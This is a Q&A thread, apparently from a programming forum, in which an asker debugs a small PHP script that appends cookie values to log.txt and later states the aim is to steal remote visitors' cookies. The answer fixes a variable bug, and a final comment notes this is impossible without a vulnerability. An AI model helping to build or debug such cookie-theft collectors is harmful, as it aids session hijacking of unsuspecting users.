# PHP cookie logging

Tags: php, cookies

I have 2 files on my host, first is c.php and second is log.txt. The file c.txt contains:

```
  <?php
  $cookie = $_COOKIE["name"]; 
  $steal = fopen("log.txt", "a");
  fwrite($steal, $name ."\n");
  fclose($steal);
  ?>
```

So it should log all the cookies and store it in log.txt file. But when I execute c.php, I don't get any errors, even then the log.txt file is empty.

The log.txt is fully writable and has all permissions (777). Please tell me what is going wrong. Thx in advanced.

Comment: Sorry dont know why it didnt appear. Pls check it again.

Answer (score 1):

Because you are not writing the cookie value.. Change `$name` to `$cookie` on your code.

#### The code...

```
<?php
$cookie = $_COOKIE["name"];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n"); //<---- Must be $cookie instead of $name
fclose($steal);
?>
```

or simply use a one-liner with the `file_put_contents()`

```
<?php
if(isset($_COOKIE["name"]))
{
    file_put_contents('log.txt',$_COOKIE["name"].PHP_EOL,FILE_APPEND);
}
else {  file_put_contents('log.txt',"No Cookie Found!!".PHP_EOL,FILE_APPEND); }
```

Comment: Both codes just put up a line break in log.txt. But aren't logging cookies.

Comment: Wouldn't it have PHP closing tag?

Comment: Nah PHP closing tag is optional , Check whether atleast `No Cookie Found` is writing to your file.

Comment: Yeah, its writing No Cookie Found. But why so? Why it is unable to find cookies? The problem is not only with me. Its strange that no one has cookies stored.

Comment: Hmm , so can you post the code on the question where you are setting the cookie ?

Comment: My objective is to steal or log the cookies that the remote browser has in a file called log.txt. But its not possible that no one has cookies stored on his browser. Can you advise?

Comment: How will you steal the cookies without finding a vulnerability on the remote system ? You cannot read their cookies unless you find a loophole.